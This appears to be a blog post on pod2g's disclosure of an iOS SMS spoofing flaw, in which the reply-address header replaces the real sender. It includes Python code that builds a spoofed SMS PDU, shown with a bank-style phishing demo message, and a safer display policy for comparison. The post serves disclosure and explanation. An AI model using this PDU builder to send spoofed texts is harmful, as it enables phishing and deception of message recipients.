pod2g has just published a blog post about an SMS vulnerability he's found in iOS that lets an attacker abuse the SMS protocol to spoof the apparent sender of a text message. The flaw has existed since the first version of iOS and is still present in iOS 6 beta 4.
He's now urging Apple to fix it.
He goes on to explain a bit about the format used to carry SMS messages, PDU (Protocol Data Unit), and how it works.
PDU is a protocol that is pretty dense, allowing different types of messages to be emitted. Some examples: SMS, Flash SMS, Voice mail alerts, EMS, ... The specification is large and pretty complex. As an example, just to code the data, there are multiple possible choices: 7bit, 8bit, UCS2 (16bit), compressed or not, ...
The problem is that anyone with a smartphone or a modem can send messages in this raw PDU format. There is also an optional section, the UDH (User Data Header), which not all phones support but which carries more advanced features. One of them is a reply address: the sender can specify a number, different from the one the message actually comes from, to which replies should go. The iPhone supports this feature, but instead of showing both the originating number and the reply-to number it displays only the reply-to number as the sender, so the recipient loses track of where the message really came from. That is what lets an attacker make a message appear to come from any number they choose.
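To make the mechanism concrete, here is an added example (not pod2g's tool and not code from his post) that builds an SMS-DELIVER PDU carrying a UDH Reply Address Element, decodes it back, and contrasts two display policies: one that shows the reply address as the sender, and one that keeps the network-asserted originating address visible. It assumes the Reply Address Element is IEI 0x22 whose data is a standard address field (digit count, type-of-address, nibble-swapped digits), which is my reading of 3GPP TS 23.040; the two `sender_shown_*` functions are hypothetical models of a handset's display logic, the phone numbers are fictitious (Ofcom's reserved 447700900xxx drama range), the message text is constructed and the timestamp is made up.

```python
"""Build and decode a GSM SMS-DELIVER PDU carrying a UDH Reply Address Element.
Constructed example: the network-asserted originating address (TP-OA) and the
sender-chosen reply address (UDH IE 0x22) are separate fields, and a handset
that shows only the latter as "From" can be fooled. Numbers are fictitious."""
import re

IEI_REPLY_ADDRESS = 0x22   # 3GPP TS 23.040 "Reply Address Element" (assumed layout below)
TOA_INTERNATIONAL = 0x91   # Type-of-Address: international number, ISDN plan
# Only characters whose GSM 03.38 code equals their ASCII code are accepted,
# which keeps the 7-bit packing honest without a full alphabet table.
_GSM_ASCII = re.compile(r"^[ !\"#%&'()*+,\-./0-9:;<=>?A-Za-z]*$")

def encode_address(digits: str) -> bytes:
    """Address field (TS 23.040 9.1.2.5): digit count, TOA, nibble-swapped BCD."""
    if not digits.isdigit():
        raise ValueError("address must be decimal digits")
    padded = digits + "F" if len(digits) % 2 else digits
    swapped = "".join(padded[i + 1] + padded[i] for i in range(0, len(padded), 2))
    return bytes([len(digits), TOA_INTERNATIONAL]) + bytes.fromhex(swapped)

def decode_address(buf: bytes, pos: int):
    """Return (digits, position after the field); the TOA at buf[pos+1] is ignored."""
    ndigits, nbytes = buf[pos], (buf[pos] + 1) // 2
    raw = buf[pos + 2:pos + 2 + nbytes].hex().upper()
    swapped = "".join(raw[i + 1] + raw[i] for i in range(0, len(raw), 2))
    return swapped[:ndigits], pos + 2 + nbytes

def pack_7bit(text: str, pad_bits: int) -> bytes:
    """GSM 7-bit packing, LSB first, with pad_bits fill bits before the first septet."""
    if not _GSM_ASCII.match(text):
        raise ValueError("text outside the ASCII-identical GSM 7-bit subset")
    value = 0
    for i, ch in enumerate(text):
        value |= ord(ch) << (pad_bits + 7 * i)
    return value.to_bytes((pad_bits + 7 * len(text) + 7) // 8, "little")

def unpack_7bit(buf: bytes, pad_bits: int, nsept: int) -> str:
    value = int.from_bytes(buf, "little") >> pad_bits
    return "".join(chr((value >> (7 * i)) & 0x7F) for i in range(nsept))

def build_udh(reply_digits: str) -> bytes:
    """UDH with one Reply Address IE whose data is an ordinary address field (assumption)."""
    ied = encode_address(reply_digits)
    ie = bytes([IEI_REPLY_ADDRESS, len(ied)]) + ied
    return bytes([len(ie)]) + ie                 # UDHL counts the bytes after it

def encode_sms_deliver(originator: str, text: str, reply_to=None) -> bytes:
    first_octet, udh = 0x04, b""                 # MTI=00 SMS-DELIVER, TP-MMS=1
    if reply_to is not None:
        first_octet |= 0x40                      # TP-UDHI: user data starts with a header
        udh = build_udh(reply_to)
    pad_bits = (7 - (len(udh) * 8) % 7) % 7      # fill up to the next septet boundary
    udl = (len(udh) * 8 + pad_bits) // 7 + len(text)  # TP-UDL counts septets, header included
    scts = bytes.fromhex("21807121000000")       # constructed TP-SCTS: 2012-08-17 12:00:00 +00
    return (bytes([0x00, first_octet])           # 0x00: no SMSC address, as fed to a modem
            + encode_address(originator) + bytes([0x00, 0x00])  # TP-PID, TP-DCS 7-bit default
            + scts + bytes([udl]) + udh + pack_7bit(text, pad_bits))

def decode_sms_deliver(pdu: bytes) -> dict:
    pos = 1 + pdu[0]                             # skip the length-prefixed SMSC address
    first_octet = pdu[pos]
    if first_octet & 0x03:
        raise ValueError("not an SMS-DELIVER PDU")
    originator, pos = decode_address(pdu, pos + 1)
    if pdu[pos + 1] & 0x0C:                      # TP-DCS coding-group bits: 00 = 7-bit
        raise ValueError("only the 7-bit default alphabet is handled here")
    pos += 2 + 7                                 # TP-PID, TP-DCS, TP-SCTS
    udl, ud = pdu[pos], pdu[pos + 1:]
    reply_to, udh_len = None, 0
    if first_octet & 0x40:                       # walk the header's information elements
        udh_len, i = 1 + ud[0], 1
        while i < udh_len:
            iei, iedl = ud[i], ud[i + 1]
            if iei == IEI_REPLY_ADDRESS:
                reply_to, _ = decode_address(ud, i + 2)
            i += 2 + iedl
    pad_bits = (7 - (udh_len * 8) % 7) % 7
    nsept = udl - (udh_len * 8 + pad_bits) // 7
    return {"originator": originator, "reply_to": reply_to,
            "text": unpack_7bit(ud[udh_len:], pad_bits, nsept)}

def sender_shown_vulnerable(msg: dict) -> str:
    """Hypothetical handset: the reply address silently replaces the originator as 'From'."""
    return msg["reply_to"] or msg["originator"]

def sender_shown_safe(msg: dict) -> str:
    """Hypothetical handset: always show the originator; label a differing reply-to."""
    if msg["reply_to"] and msg["reply_to"] != msg["originator"]:
        return f"{msg['originator']} (replies go to {msg['reply_to']})"
    return msg["originator"]

if __name__ == "__main__":
    # Attacker's own number as originator, a fictitious "bank" number as reply-to.
    pdu = encode_sms_deliver("447700900123", "Your card is blocked. Reply to unlock",
                             reply_to="447700900999")
    msg = decode_sms_deliver(pdu)
    print(pdu.hex(), sender_shown_vulnerable(msg), sender_shown_safe(msg), sep="\n")
```

Run stand-alone, the first printed line is the hex of a PDU in the raw form a modem accepts; the next two lines show the same message as the two display policies would present it. The decoder also handles a plain message with no header, and it rejects anything that is not a 7-bit SMS-DELIVER, since the 8-bit and UCS2 encodings mentioned above are out of scope here.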
pod2g lays out a few ways in which attackers could take advantage of this flaw:
- pirates could send a message that seems to come from the bank of the receiver asking for some private information, or inviting them to go to a dedicated website. [Phishing]
- one could send a spoofed message to your device and use it as false evidence.
- anything you can imagine that could be utilized to manipulate people, leading them to trust that somebody or some organization texted them.
There are already tools that make it fairly simple to craft this data on a smartphone. He has also written a tool for the iPhone 4 that he plans to release. He is urging Apple to fix the issue before the public release of iOS 6, and warns that, for the time being, you should never trust an SMS message containing sensitive data on your iPhone.
Do you think releasing the tool will get Apple's attention, or just cause more problems for end users in the meantime?